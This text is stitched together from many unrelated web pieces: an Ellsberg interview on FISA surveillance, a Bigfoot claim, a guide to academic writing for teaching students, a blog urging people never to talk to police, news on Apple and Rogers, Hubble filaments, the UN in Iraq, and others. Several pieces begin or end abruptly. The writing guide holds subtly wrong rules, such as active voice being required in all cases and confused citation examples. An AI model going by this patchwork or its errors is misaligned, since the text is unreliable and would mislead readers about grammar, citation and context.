Various administration officials have claimed that the requirement of applying for a warrant from the FISA court deprived them of speed and flexibility .
This is false .
The FISA allows for surveillance to be implemented in an emergency situation before a warrant is sought , and that could undoubtedly be extended with Congressional approval without controversy .
What the administration seeks , and this bill provides , is permanent warrantless surveillance .
4 . Let ’s consider an analogy : police officers have the legal right to stop you if you ’re going 56 mph in a 55 - mph zone , but this right is n’t often abused or applied to harass citizens .
What makes you think the administration would abuse their surveillance powers if this amendment is approved ?
The abuses of surveillance to which governments are drawn are those that keep them in office , used to intimidate and manipulate their rivals , and to avoid debate and dissent on their policies .
These are exactly the abuses that the Church Committee discovered in 1975 , which had been conducted on a wide - scale by the Johnson and Nixon administrations , and in some cases even earlier , which is what lead to FISA in the first place .
To remove judicial oversight , which this amendment would effectively do , is to invite the same kind of repressive abuse that lead to FISA in the first place .
5 . Why would the current administration want this amendment to pass , if not for safety of citizens and prevention of attacks ?
Using NSA to spy without judicial oversight or constraint on American citizens provides the infrastructure for dictatorship .
George W. Bush has frequently said what other presidents may only have thought : “ It would be a heck of a lot easier in a dictatorship , if only I were the dictator . ”
Other presidents have violated the law and the Constitution in much the same way as Bush , so long as they could do it secretly , but they have n’t proclaimed that as a right of their office as Bush , Cheney and their legal advisors have done .
The oath of office they took , along with all members of Congress , was to support and defend the Constitution against all enemies , foreign or domestic .
I believe that , in the matters we ’ve been discussing , the Founders had it right , not only for their time but for ours .
###
Please Digg and Buzz this below if you believe this is important .
Please act now , as hours matter .
Extended bio of guest :
Daniel Ellsberg ’s earlier career includes serving as a Marine Corps company commander and earning a PhD. in Economics from Harvard .
In 1959 he joined the Rand Corporation ’s Economics Department as an analyst , and consulted for the Kennedy Administration on the command and control on nuclear weapons .
In 1964 he was recruited to serve in the Pentagon under Secretary of Defense Robert McNamara .
Following two years in Vietnam for the State Department , Ellsberg eventually returned to Rand .
In 1971 he made headlines around the world when he released the Pentagon Papers .
Ultimately his actions helped end not only the Nixon presidency but the Vietnam War .
Related and Recommended
The Tim Ferriss
Show is one of the most popular podcasts in the world with more than 500 million downloads .
It has been selected for " Best of Apple Podcasts " three times , it is often the # 1 interview podcast across all of Apple Podcasts , and it 's been ranked # 1 out of 400,000 + podcasts on many occasions .
To listen to any of the past episodes for free , check out this page .
Two Bigfoot hunters claim they have the body of one and plan to release a photo and what they claim is DNA evidence at a news conference in Palo Alto on Friday .
The Bigfoot is claimed to have been found in the woods of northern Georgia by Matthew Whitton and Rick Dyer , and the claim is being supported by a Bay Area Bigfoot researcher Tom Biscardi , a multiple local Democratic candidate .
The press release as follows .
A site claiming to have the first pics is down , but here ’s the link in case it comes back up , although the pic top right is said to be one of the shots currently available .
Other sites are suggesting this could be the “ real deal ; ” who knows , we ’ll have to wait for the press conference and the proof .
UPDATE : Cryptomundo just loaded for me and this is the pic they have , real or not real ???
All teachers should help their students become better writers .
To achieve this , teachers in training should familiarize themselves with as many writing types as possible .
The journey begins as soon as you apply to a program , as you must write a convincing personal statement as part of your application .
Once in a program , academic coursework includes multiple research papers and essay questions .
Strong writing skills help degree candidates articulate themselves clearly .
This is important as teachers regularly write to communicate with administrators and parents .
Clear , concise writing helps you express ideas and lets others know that you possess the skills necessary to educate the next generation .
You can instruct students on these writing techniques , which benefit them later in life as they write college application essays , resumes , and cover letters .
Types of Writing Teachers Will Do in School
Personal Statements
Developing your writing style begins even before you apply .
Most programs require applicants to submit a personal statement .
Personal statement questions vary by program , but most ask applicants why they wish to attend the program and their career goals .
Admission counselors appreciate essays that reflect a passion for teaching .
They also prefer to read polished essays with near - perfect grammar and punctuation .
To differentiate your personal statement , consider sharing real - life experiences .
If the prompt questions why you want to become a teacher , discuss the event that led you to that realization .
A personal story humanizes you in an admission counselors ' eyes .
When writing about personal experience , try to avoid negative or controversial topics unless you are discussing overcoming adversity or learning from a past mistake .
Submit personal statements to all programs to which you apply , even if they are optional .
A great personal statement introduces you to the school and leaves a lasting impression .
Exams
In a teaching program , many exams include long - form essays .
Some professors provide the prompt in advance , but if not , you can focus on either the study guide or unit materials to identify the largest or most complex topic covered .
Professors often choose these topics for essay questions .
When starting any exam essay , use at least five minutes of the allotted time to plan and outline your essay .
Create a thesis statement that answers the question .
Then connect ideas from your prior knowledge to the thesis .
If at least three separate ideas connect to your thesis , you can begin writing the essay .
If you can brainstorm only one or two significant ideas , consider editing your thesis to better match the available evidence you can remember from the unit .
When you write an exam essay , always use a pencil and save at least five minutes for proofreading .
This allows you to edit your text , polish any awkward areas , and replace weak examples .
Awkward language can lead to your professor not understanding your point , resulting in a lower grade .
Research Papers
Research papers require students to research a specialized topic and may take weeks or months to complete .
Students receive an assigned topic or question and then conduct research to develop their own opinions .
A common research paper topic for teaching students involves the impact and validity of different child development theories over the last century .
Like an essay , you connect main ideas from your research , quotes , and paraphrases to your thesis statement .
Using your research , you create an essay outline where you can rearrange ideas before you begin writing .
When writing an essay , always begin with an introductory paragraph that includes your thesis statement .
After that , follow these steps : introduce the idea , provide direct evidence through quotes or paraphrases , expand or comment on this evidence using your ideas , and conclude by transitioning into the next main idea .
A double - spaced , 10 - page essay generally includes three to four main ideas .
Before wrapping up , consider addressing any possible counterarguments .
You can refute or concede to these counterarguments .
Finish your essay with a concluding paragraph , and have someone proofread your paper .
Performing this extra step can significantly raise your grade .
How Do You Write an Essay ?
Begin by choosing which type of essay you want to write .
Do you want to tell a story , or do you want to change someone 's mind about an issue ?
In the bullet points below , review the five most common essay types that teachers in training can use when teaching writing structure and style .
Narrative
These essays tell stories from the author 's point of view and often invoke readers ' emotions .
Writers can use first - person language , as they are the key witness to the events unfolding on the page .
Students should use clear , concise language and include all relevant details .
Expository
This format blends features of other essays .
Students investigate one or more ideas and create an argument using cause - and - effect or persuasive techniques .
The best expository essays use clear transitions , support points with evidence , and include a concluding paragraph that reexamines the thesis statement in light of everything that preceded it .
Persuasive Also known as an argumentative essay , writers use this essay type to change readers ' minds on a topic or issue .
Writers perform extensive research before outlining their responses .
Persuasive essays often use quotes and paraphrases from authority figures to support the writer 's claims , which a thesis statement anchors .
Invest as much time on research and outlining as on writing and editing this essay .
Comparative
In this essay , writers compare two or more items , positions , texts , or events .
Teachers likely assign the two items to compare , but sometimes students must develop their own items based on a certain theme .
First weigh the similarities and differences between the two items you plan to compare .
The results of your brainstorming become your essay 's foundation : the thesis statement .
Cause and Effect
This format either focuses on the causes or effects of an event .
Once you decide your essay 's path , build it around three ideas that support your thesis .
If your essay focuses on causes , mention one or more effects in your opening paragraph so that readers understand the connection .
Like a good persuasive essay , a good cause - and - effect essay helps shift readers ' thinking to your point of view .
Citations Guide for Teaching Students
Using citations ensures that you attribute quotes and ideas to their respective authors .
Not doing so may lead to a lower grade or an automatic fail .
From high school to doctoral - level graduate programs , students use one of four citation systems : American Psychological Association ( APA ) , Chicago Manual of Style ( CMS ) , Modern Language Association ( MLA ) , or Associated Press ( AP ) .
Learn more about which professions use these styles and how citations differ in the sections below .
American Psychological Association Style Developed by the American Psychological Association , social sciences students use APA style when writing research papers .
Like all citation systems , this style features in - text citations , footnotes , and a reference page .
Papers include a title page , abstract , essay , and reference page in that order .
Compared to other citation systems , APA style emphasizes each reference 's date of creation .
When writing a citation at the end of an APA - style essay , the copyright year immediately follows the author or creator 's name .
( Richard Smith , 2012 , page 76 )
The scientists discovered an amazing gem at the bottom of the mine ( Smith , 2005 ) .
Chicago Manual of Style
The CMS style involves a citation system and many unique grammar and usage rules .
This style includes in - text citations and those that follow the text or a footnote on the same page .
Only writers using CMS style have this option .
All other citation systems have the writer include the full citation at the end of the text .
New editions of the CMS appear approximately every 10 years , so be sure to use the latest version .
( Bob Adams , 1993 , page 12 )
" We will never know if extraterrestrial life exists " ( Adams 1993 , 12 ) .
Modern Language Association Format Students studying literature , English , other languages , and different cultures predominantly use MLA style .
MLA boasts fewer rules than other citation styles , which allows high school students to learn it as their first citation system .
At the undergraduate and graduate levels , some social sciences professors prefer that students use MLA over APA .
Many free online resources exist to help students successfully use MLA style .
( Caulfield , 1955 , page 33 )
" The camera is the artist 's greatest tool " ( Caulfield 33 ) .
Associated Press Style Journalists throughout the U.S. use AP style to guide their grammar , usage , and citations .
Developed by the Associated Press news agency in the 1970s , AP style includes specific rules for business and sports reporting .
The guide also includes sections on editing marks and punctuation .
AP prohibits using the Oxford comma .
On the AP style website , visitors can subscribe to an online version for a small annual fee or sample a free trial .
( Hank Nichols , 2014 , page 12 )
" Men are only as good as their masters , " Nichols wrote in his 2014 bestselling novel , Man at the Window .
The Best Writing Style for Education Majors
In your teacher preparation program , your professors likely use APA or MLA format .
Becoming familiar with these citation methods before starting your degree should help you become a better academic writer .
Although mastering academic writing and APA / MLA format might come naturally to you , consider your future students .
To help students improve their writing and learn at least one citation format , consider using one or more of the resources provided by the Institute for Excellence in Writing ( IEW ) .
IEW 's products and events help teachers and parents become more effective writing teachers .
Teachers of English language learners and special needs students can find multiple resources as well .
For first - time visitors , IEW offers a series of free webinars .
These introduce the IEW teaching writing structure and style and other instructional best practices .
Common Writing Mistakes Students Make Active vs. Passive Voice Active and passive voice describe the relationship between a sentence 's subject and verb .
In active voice , the subject performs the verb .
( Sammy bought a cake . )
In passive voice , the subject does not perform the verb .
The action instead happens to the subject .
( The cake was bought by Sammy . )
Both active and passive voice represent grammatically correct ways to write .
However , they create two traps for many writers .
The first trap involves mixing active and passive voice .
Pick one voice and stick with it .
Also , the rules of standard English insist that you use active voice in all cases .
Many people find that reading passive voice sounds wordy and unnecessary .
To avoid passive voice , always proofread your text , invest in a grammar - check program , or ask someone to edit your paper .
Punctuation Punctuation refers to the characters used in the English language that are not part of the 26 - letter alphabet .
These characters indicate the end of sentences , pauses in speech , and emphasis .
Periods , questions marks , and exclamation points always come at the end of a sentence .
After a complete sentence , you can use a colon to begin a list .
Semicolons connect two complete sentences that share the same topic .
Most punctuation mistakes involve commas .
The first rule to remember concerns the Oxford comma , putting a comma after the second to last item in a list .
Example : Mary bought a donut , ice cream , and soda today .
The comma after ice cream is the Oxford comma .
Some writing styles use the Oxford comma .
Another avoidable comma mistake involves always placing a comma between two adjectives that describe a noun .
Example : William bought an expensive , beautiful house last year .
A comma splice involves incorrectly joining two complete sentences with a comma .
Grammar Grammar refers to the proper use of the English language .
Many mistakes students make consist of simple errors that they began using as children and did not remedy .
For example , many students have trouble correctly using there , their , and they 're .
These three words are homophones .
They have the same pronunciation but different spellings and meanings .
There indicates a location ; their indicates a possessive ; and they 're is a contraction of ' they are ' .
Other common homophones people mix up include its ; it 's ; your / you 're ; and pique , peek , and peak .
Another grammar trap to avoid involves when to use ' who ' or ' whom ' in a sentence .
Both refer to a singular noun when asking a question .
Which one to use involves substituting he or him into the sentence .
If ' he ' works , use ' who . '
If ' him ' works , use ' whom . '
Writing Resources for Teaching Students
Purdue Online Writing Lab Purdue OWL represents your one - stop shop for information regarding academic writing , such as citation guides and teaching resources .
Many teachers in training who use Purdue OWL in college continue to use the free service as teachers .
National Writing Project
The NWP resource topics page provides what both new and experienced teachers need to help their students learn how to become more effective writers .
Specialized topics include urban education , special needs , and digital writing .
Scholastic Writing Resources Scholastic helps teachers with premade writing lesson plans .
These resources can help teaching students learn the basics of what makes an engaging lesson plan .
readwritethink
This resource provides new teachers with hundreds of ideas for classroom activities that help students become better writers .
The website breaks down activities by grade level , so teaching students preparing for all grade levels can use it as a reference .
Writing A - Z
This resource focuses on both emerging writers and fluent writers , giving teachers the tools to help students at all ability levels .
Last Updated : July 01 , 2019
I just watched a great set of videos about why you should never talk to the police for any reason .
Here 's the first one , by Professor James Duane , giving a background on the law and a bunch of different scenarios where even if you 're innocent , anything you say just makes your life worse .
Then , there 's a second video , by a cop , about exactly why the law professor is correct .
It 's a nice set .
( Do n't let the fact that Professor Duane talks way too fast annoy you , you just have to ignore it and focus on the good stuff , he makes some really great points . ) I find this particularly interesting because I 've been interrogated by cops and various security professionals several times in my life , and I 've found myself doing exactly what he describes here , talking way too much to try to convince them that I 'm innocent , or embellishing the truth if I 'm trying to get out of something .
You always , always end up saying the wrong things , or going a bit too far in your earnest desire to help prove your innocence .
I 've always regretted it in retrospect .
The primary point that he makes is that the 5th amendment is NOT just for criminals to protect themselves , it 's also for innocent people to protect themselves from the system .
Anything you say that is false , even unrelated to the case at hand , is ammunition against you .
And even the fact that you talked to them at all , even if everything you said was 100 % fact , can be used against you if the cop misremembers what you said .
At the end of the day , absolutely nothing you say to the police helps you , it can only hurt you , and that 's a very interesting thing to keep in mind .
Innocent or not , your words are ammunition against you .
The only way to win , is not to play , as I learned from WarGames .
Do n't ever talk to the police .
This week , the Wall Street Journal ’s Holman Jenkins returned to his hobby horse of propping up housing prices by having the federal government pay for the destruction of houses .
( $ article )
“ So far , Washington has put its political capital into trying to refinance salvageable homes for unsalvageable homeowners , when a relevant policy would consist of judiciously buying unsalvageable houses and demolishing them .
Fannie and Freddie ’s strength is housing market software :
They could be put to work devising a least - cost , maximum - bang strategy for demolishing unoccupied homes to preserve as much value as possible for the homeowners and mortgage creditors who remain . ”
I invite readers of this blog to propose other examples in which the US government could provide a service to some portion of the market it has wrecked with excess credit creation , subsidies or other counterproductive interventions .
For example , why not tax the public and use the money to demolish ethanol plants , thereby improving the supply / demand balance for the subsidized but ailing ethanol producers ?
Or how about a Rescue Fund to pay above market prices for – and then destroy – used Big 3 cars and vehicles coming off - lease ?
This would relieve oversupply and prop up the aftermarket / residual values for the unwanted products of American automakers , helping them to avoid imminent bankruptcy .
Maybe Jenkins ’ Republican and crony capitalist friends should propose a cabinet level National Supply Destruction Agency that would judiciously demolish what it considers to be unsalvageable products throughout the economy ?
Mr. Jenkins concludes his article with a proposal to fix Freddie Mac and Fannie Mae :
“ Of course , right now their [ Fannie / Freddie 's ] overriding imperative is to avoid recognizing losses rather than rushing toward them — which is why Fannie and Freddie should be nationalized ( and later privatized ) . ”
This would merely set them up in the private sector with “ non-explicit ” federal guarantees , further moral hazard , and re-nationalization some time in the future .
Why not bulldoze them , Mr. Jenkins ?
Rather than a game , Wii Fit is more comparable to an exercise program .
More specifically , it ’s something that most people would consider playing in short bursts each day .
A recent poll , however , shows that close to two - thirds of Japanese gamers are already giving up on the product .
ITMedia in Japan took poll data from 1000 gamers and a staggering 64 % of the participants said they stopped using Wii Fit after purchase .
Do you use Wii Fit faithfully everyday ?
– 22 % – I record my progress faithfully everyday
– 6 % – Maybe once every two or three days
– 6 % – Once a week
– 64 % – Stopped using after purchase
Source
Share this : Twitter
Facebook
Reddit
Tumblr
Pinterest
More
Email
Print
LinkedIn
Google
Pocket
Wives , submit yourselves unto your own husbands , as it is fit in the Lord .
Colossians 3:18
Teach the young women to be ... obedient to their own husbands , that the word of God be not blasphemed .
Titus 2:4-5
Likewise , ye wives , be in subjection to your own husbands .
1 Peter 3:1
Apple , disgusted with Rogers Wireless for dumping egregious service plans on would - be iPhone 3G buyers , has decided that its Canadian retail stores will have no part in helping the carrier market the new handset to customers , AppleInsider has learned .
As a result , Canadian Apple Retail stores wo n't be selling the new 3G touchscreen phones come Friday , representatives for the Cupertino - based company said during a private conference call on Monday evening .
Instead , it will be up to Rogers and its partner Fido to lock subscribers into steep 3 - year contracts that require a minimum monthly payment of $ 60 for just 150 minutes , 75 text messages , and 400 MB of data .
Calls to Canadian Apple retail stores early Tuesday confirmed the move once over .
Although the majority of the of stores contacted by AppleInsider said they were still unsure whether they'd be selling the new iPhone , one representative ultimately confirmed that Rogers and its partner stores will be the only place to buy iPhone 3G come Friday .
Canadian Apple retail stores will , however , have demo units on hand the same day .
Asked whether the decision not to sell the iPhone was a result of Rogers ' poor service offerings , the representative would only say that : " We have nothing to do with the service plans .
Those are Rogers ' plans . "
Word of Apple 's abandonment of in - store sales comes just days after the company was reported to have sanctioned Rogers by diverting a significant amount of Canada 's iPhone 3G shipments to Europe as initial retribution .
As a result , the Canadian carrier will likely receive only about 10 to 20 units per store , and therefore should " exercise caution " not to promise ample stock on launch day , people familiar with the matter have said .
Apple 's knee - jerk reaction is believed to have been further stimulated by public outrage on the part of Canadian consumers following the release of the local pricing plans .
Always concerned with its image , the iPhone maker has watched nearly 50,000 of its loyal customers sign an anti-Rogers petition at ruinediphone.com , which has in turn sparked hundreds of potentially damaging reports on the matter by bloggers and members of the mainstream media .
For its part , Rogers in official statements has attempted to justify the cost of its service and data plans by arguing that the " majority " of international iPhone carriers have capped data .
As such , a spokesperson said Rogers believes its plans to be better than those of Orange France , for example , which include a 500 MB ' reasonable use ' limit versus the 2GB maximum on the top - tier Canadian iPhone plan that fetches $ 115 per month .
If Western interests are not to be irreparably damaged , we will need to understand that they are being tested on three overlapping levels : local , regional and global .
Georgia is not just a square on a chessboard , but a country that is extremely important in its own right .
For two reasons , the West can not be indifferent to what happens there .
First , despite the uncultivated instincts of its president , Georgia 's political culture is fundamentally democratic , its people ( 80 per cent of whom support Nato membership ) profoundly pro-Western , and its sense of national identity almost indestructible .
Georgia can be defeated by Russia , but it can no longer submit to it , and therefore war between Georgia and Russia would be a frightening prospect even if no wider interests existed .
Second , the only energy pipeline in the former USSR independent of Russian control passes through Georgia .
There will be no meaningful energy security , let alone diversification of energy supplies , if these pipelines become vulnerable to sabotage , like those in Iraq , or to takeover by shadow businesses fronting for Russian interests .
by
Picture your typical afternoon commute .
Â
If it ’s anything like what most of suburbia has to deal with , you ’re probably visualizing being stuck on a major highway , surrounded by slow moving vehicles being piloted by angry looking drivers .
Now – look a little closer at this picture in your head .
Â
Are most of the cars that surround you filled with more than one person ?
Â
Chances are , probably not .
According to a recent poll on GasBuddy.com which asked , “ What percentage of the time you are in a car with other people ? ” ( not sure this is worded correctly , but I think you get the point ) , much of the time we ’re in a car , we ’re driving by ourselves .
Here ’s the breakdown of the poll :
37 % of respondents stated that they drive with other people between 0 % and 10 % of the time .
29 % of respondents stated that they drive with other people between 10 % and 35 % of the time .
15 % of respondents stated that they drive with other people between 35 % and 65 % of the time .
9 % of respondents stated that they drive with other people between 65 % and 90 % of the time .
7 % of respondents stated that they drive with other people more than 90 % of the time .
Long story short , 66 % of us do at leastÂ two - thirds of our driving by ourselves .
Â
I know this is akin to Yogi Berra ’s “ 90 % of baseball is half mental , ” but I think it ’s easy to see that most of us do most of our driving by ourselves .
Why is that ?
Â
I mean , we know that we should carpool because it ’s less wasteful and helps ease traffic , but this knowledge does n’t seem to be enough .
TheÂ main reason comes down to convenience .
Â
It ’s simply more convenient for us to just hop in our own car and get to where we need to go ( work , the store , drop the kids off at soccer practice ) than it is to try and coordinate our schedules with other people .
I think this is also the main reason why people do n’t take advantage of mass transportation as much as they should .
Â
It tends to be inconvenient to mold your schedule around when the bus or train can take you to where you ’d like to go .
That being said , it does n’t have to be that difficult or put you out that much to drive around with other people in your car .
Â
If you live with someone , ask them if they want to go to the store with you to save a trip ; if you know co-workers that live in or near your neighborhood , seek them out to see if they ’d be interested in carpooling a couple of days per week .
Even if you can decrease the percentage of time you drive alone by 10 % , you ’ll be making a pretty big difference .
Two communities affected by one new global market – the trade in carbon dioxide .
In Scotland , a town has been polluted by oil and chemical companies since the 1940s .
In Brazil , local people 's water and land is being swallowed up by destructive monoculture eucalyptus tree plantations .
Both communities now share a new threat .
As part of the deal to reduce greenhouse gases that cause dangerous climate change , major polluters can now buy carbon credits that allow them to pay someone else to reduce emissions instead of cutting their own pollution .
What this means for those living next to the oil industry in Scotland is the continuation of pollution caused by their toxic neighbours .
Meanwhile in Brazil , the schemes that generate carbon credits gives an injection of cash for more planting of the damaging eucalyptus plantations .
The two communities are now connected by bearing the brunt of the new trade in carbon credits .
The Carbon Connection follows the story of two groups of people from each community who learned to use video cameras and made their own films about living with the impacts of the carbon market .
From mental health issues in Scotland to the loss of medicinal plants in Brazil , the communities discover the connections they have with each other and the film follows them on this journey .
40 minutes | PAL / NTSC | English / Spanish / Portuguese subtitles .
The Carbon Connection is a Fenceline Films presentation in partnership with the Transnational Institute Environmental Justice Project and Carbon Trade Watch , the Alert Against the Green Desert Movement , FASE-ES , and the Community Training and Development Unit .
Learn about the impact of carbon trading and offsets at Carbon Trade Watch .
The Hubble Space Telescope has found the answer to a long - standing puzzle by resolving giant but delicate filaments shaped by a strong magnetic field around the active galaxy NGC 1275 .
It is the most striking example of the influence of these immense tentacles of extragalactic magnetic fields , say researchers .
NGC 1275 is one of the closest giant elliptical galaxies and lies at the centre of the Perseus Cluster of galaxies .
It is an active galaxy , hosting a supermassive black hole at its core , which blows bubbles of radio - wave emitting material into the surrounding cluster gas .
Its most spectacular feature is the lacy filigree of gaseous filaments reaching out beyond the galaxy into the multi-million degree X - ray emitting gas that fills the cluster .
These filaments are the only visible - light manifestation of the intricate relationship between the central black hole and the surrounding cluster gas .
They provide important clues about how giant black holes affect their surrounding environment .
A team of astronomers using the NASA / ESA Hubble Space Telescope Advanced Camera for Surveys have for the first time resolved individual threads of gas which make up the filaments .
The amount of gas contained in a typical thread is around one million times the mass of our own Sun .
They are only 200 light - years wide , are often surprisingly straight , and extend for up to 20 000 light - years .
The filaments are formed when cold gas from the galaxy ’s core is dragged out in the wake of rising bubbles blown by the black hole .
It has been a challenge for astronomers to understand how the delicate structures withstood the hostile high - energy environment of the galaxy cluster for more than 100 million years .
They should have heated up , dispersed , and evaporated over a very short period of time , or collapsed under their own gravity to form stars .
Even more puzzling is the fact that they have n’t been ripped apart by the strong tidal pull of gravity in the cluster ’s core .
A new study led by Andy Fabian from the University of Cambridge , UK , published in Nature on 21 August 2008 proposes that the magnetic fields hold the charged gas in place and resist forces that would distort the filaments .
This skeletal structure has been able to contain and suspend these peculiarly long threads for over 100 million years .
“ We can see that the magnetic fields are crucial for these complex filaments - both for their survival and for their integrity ” , said Fabian .
The new Hubble data also allowed the strength of the magnetic fields in the filaments to be determined from their size .
Thinner filaments are more fragile , requiring stronger magnetic fields for support .
However , the finer the filaments , the more difficult they are to observe .
The filamentary system in NGC 1275 provides the most striking example of the workings of extragalactic magnetic fields so far and is a spectacular by - product of the complex interaction between the cluster gas and the supermassive black hole at the galaxy ’s heart .
Similar networks of filaments are found around many other , even more remote , central cluster galaxies .
They can not be observed in anything like the detail of NGC 1275 , so the team will apply the understanding gained here to interpret observations of these more distant galaxies .
BAGHDAD ( Reuters ) - The United Nations pledged on Wednesday to hasten its cautious steps in helping Iraq rebuild , five years after a devastating bomb pushed it to pull foreign staff out of the country .
Handout photograph of casket of U.N. Chief Ambassador to Iraq Sergio Vieira de Mello being covered with a United Nations flag by U.S. Army Colonel Richard Dillon ( L ) , head of USA Mortuary Affairs , and Air Force Colonel Dennis Ployer , commander of the 447th Air Expeditionary Group , prior to a memorial service at the Baghdad International Airport on August 22 , 2003 .
The United Nations pledged on Wednesday to hasten its cautious steps in helping Iraq rebuild , five years after a devastating bomb pushed it to pull foreign staff out of the country .
REUTERS / Handout
U.N. and Iraqi officials gathered at U.N. headquarters in Baghdad ’s fortified Green Zone for a somber ceremony commemorating the 22 people who died when a truck bomb struck U.N. offices in a Baghdad hotel on August 19 , 2003 .
It was a grim turning point in the first months after the U.S. - led invasion to topple Saddam Hussein , prompting the U.N. to withdraw most foreign staff and foreshadowing the bloodshed that quickly took hold across Iraq .
“ There are moments when we wonder whether all this was worth it or not , ” U.N. special representative Staffan de Mistura said .
“ What we are doing at the moment is sending a signal that the U.N. is back .
The U.N. is back to stay .
The U.N. is back to have its footprint increasing , its activities increasing . ”
U.N. officials say there are about 350 international civilian and military staff members across the country , and that the number of civilian foreign staff members increased by 30 percent over the last year .
Iraqi Planning Minister Ali Baban and David Shearer , De Mistura ’s deputy , signed a two - year pact governing the U.N. ’s humanitarian , reconstruction and development activities in Iraq .
The new U.N. strategy targets what it called a “ worsening human rights situation and an overall deterioration of services , infrastructure and shelter ” , among other challenges .
The needs are great .
Violence has driven some 4.5 million Iraqis to flee their homes to other parts of Iraq or to neighboring countries .
Within Iraq , unemployment is sky - high .
About half of the rural population lacks proper access to drinking water .
Sewage flows into the Tigris and Euphrates rivers .
More than 3,000 primary schools and some 1.27 million new homes are needed .
CAUTIOUS STEPS
But officials said the new strategy does not foresee a quick ramping up of foreign staff levels in Iraq past current levels , due mainly to continuing security precautions , or in U.N. spending , which stands at about $ 350 million a year .
They say their focus has shifted from bricks - and - mortar projects , such as building schools , to training and advising Iraqi ministries and officials .
With violence at four - year lows across Iraq , the United Nations is also venturing further into the tempestuous world of Iraqi politics .
U.N. officials sought to broker a compromise this month to an impasse in parliament over plans for a provincial elections law needed to hold the anticipated polls this year .
The U.N. proposal ultimately failed to end the deadlock over the fate of the oil - rich city of Kirkuk , a feud which has stoked tensions with Iraq ’s minority Kurds .
The U.N. voice in Iraq may grow as that of the United States becomes less dominant .
U.S. and Iraqi officials are negotiating an agreement that will outline the U.S. presence in Iraq after its mandate expires in December , and Iraqi officials have said they want U.S. combat troops out of Iraq by 2010 .
“ In coming years , the political role of the United Nations in Iraq will grow , ” Minister Baban said .
( Editing by David Clarke and Michael Winfrey )
In a one - bedroom flat above a noisy San Francisco street , Scott Sigler is plotting a revolution in the world of books .
Sigler is a science - fiction writer with a host of fans , who are described as " junkies " on his website .
His work is gripping , pacy , and often stomach - churningly violent .
He tells stories that are , as the saying goes , hard to put down .
But what makes
Sigler groundbreaking is that most of his novels have never appeared in print .
They are broadcast via a small cubicle containing an Apple Macintosh and some recording equipment .
That is pretty much all Sigler has needed to become the world 's most famous podcast author .
" I sit right here , " he says , motioning to a small chair .
" Sometimes I 'll read for half an hour , sometimes more .
I give special voices to each character , and try to make it sound over the top .
I might use a guitar song , or heavy metal music .
Then it goes online and people can download it for free . "
Download the new Independent Premium app Sharing the full story , not just the headlines
One oddity of the internet revolution has been that , while it changed the face of popular music , authors and their works have remained relatively untouched .
Some bookstores were rudely shunted out of business by Amazon , but the creative bit happens much as it always has ; writers produce fiction that 's packaged and sold in books .
There has been no real market for electronic fiction .
Until Sigler .
His novels were all first released as audio books , free for online subscribers to download , one episode at a time , over a few months .
His first , Earthcore , notched up 10,000 listeners .
Its sequel , Ancestor , managed 30,000 .
A third , The Rookie , cemented his status as a Dickens for the digital age .
This week , he will try to reach the traditional book - buying public with Infected , a physical book .
The gory tale of a parasite from space that latches on to human hosts is published in the UK by Hodder as part of a five - book deal .
The book 's progress will be closely watched .
Most aspects of its marketing turn publishing wisdom on its head .
Publishers tend to guard copyright jealously , but Sigler has released a free audio version online , and has let fans download a PDF version via his website .
Sigler 's thinking – and this is the revolutionary bit – is that it 's worth making commercial sacrifices to secure a fan base , because fans will always want physical copies of the books , even if they 've already heard an audio version for free .
" The only way to get people 's attention these days is to give them something for free , " Sigler says .
" If someone walks into a bookstore , why would they pick up a Scott Sigler when there 's a Stephen King ?
They wo n't .
So I give my content away , give readers a chance to try it for free .
And if they like my stuff , then guess what : they 'll go out and buy the book . "
It has taken Sigler , 38 , some time to persuade a major publisher to back his thinking .
Having written since childhood , he began podcasting in 2004 , after decades of failing to make it into print .
" I was working in IT marketing , and had discovered podcasting when not many people knew about it , " he says .
" My theory was that I knew there was a market for my stuff , I knew some people would like it , so long as I could get it out there .
If enough people listened , a percentage of them would become fans , and four or five years down the line , they 'd pay to buy my books .
That 's pretty much what happened . "
Now , visitors to scottsigler.com are part of an online community that helps to create a " buzz " .
That buzz can be managed to drive sales by manipulating the online marketplace through Amazon 's sales charts .
This is the second revolutionary element to Sigler 's fiction .
Last year , a book version of Ancestor was published by a tiny firm that sells only via mail - order .
Sigler made it to No 7 on the Amazon bestseller list ( No 1 in sci - fi ) by asking all his fans to buy a copy on the morning of its launch .
The book only sold 2,000 copies ( its entire print run ) , but they created a sales spike .
" With no marketing budget , no advertising , no media coverage and an artist nobody 's heard of , we managed to drive it up to No 7 , " Sigler says .
Sigler 's success has been a boon to other podcast authors , who mostly publish on www.podiobooks.com.
Several now have traditional book deals , with debuts coming from JC Hutchins , also a science - fiction writer , and the crime writer Seth Harwood .
Sigler seems to have star potential – and if the way he 's selling Infected works , it could help the world of publishing to avoid the fate of the music industry in the online age .
" Tech - nology will eventually change how books are written , " Sigler says .
" Now , hopefully , I 'm ahead of the game .
By the time people like Stephen King wake up to the internet , they 'll be on an equal playing field to people like me . "
' Infected ' is published by Hodder ( £ 6.99 ) ; other work is available on www.scottsigler.com
New Web sites offering consumer coupons and online promotions are flooding the Internet .
But while these sites offer a wide breadth of discounts , they 're also making it more difficult to weed out the really good deals from the duds .
" There are hundreds , if not thousands of coupon sites out there offering the exact same thing , " says Edgar Dworsky , founder of consumer advocacy site ConsumerWorld.org .
It 's the relative sameness of these sites that makes it hard for shoppers to find the best deals and discern whether the offers they see are legit or not , says Mary Hunt , the founder of the money - management site DebtProofLiving.com
We asked consumer advocates and deal hunters to point out the free - coupon sites they turn to purchase after purchase .
Here are five worth bookmarking :
Coupons.com : Phil Lempert , founder of consumer news site SupermarketGuru.com , praises this site 's simple layout , which makes it easy to browse available coupons , and then print them out for in - store use .
Enter your ZIP Code for area - specific deals .
Councilwoman helps rescue driver from fiery crash Councilwoman Jones helps rescue driver from fiery crash
Councilwoman Jolanda Jones says she and two men had little time to free the woman after the victim's car leapt off the Westpark Tollway early Sunday .
Councilwoman Jolanda Jones says she and two men had little time to free the woman after the victim's car leapt off the Westpark Tollway early Sunday .
Photo : Handout Photo Photo : Handout Photo Image 1 of / 1 Caption Close Councilwoman helps rescue driver from fiery crash 1 / 1 Back to Gallery
The sparks from the highway looked like fireworks , but Jolanda Jones ' teenage son saw what caused them : a car vaulting off the elevated stretch of Westpark Tollway before crashing about 100 feet below .
Jones followed the billowing smoke to where the car rested against a fence in the Hillcroft Transit Center .
Flames engulfed its front end .
" I think , ' Oh my God , someone 's dead , ' " Jones said .
The Houston City Council member and two other Good Samaritans happened to see the crash just before 1 a.m. Sunday .
Together , they pulled the driver from the mangled , fiery wreckage .
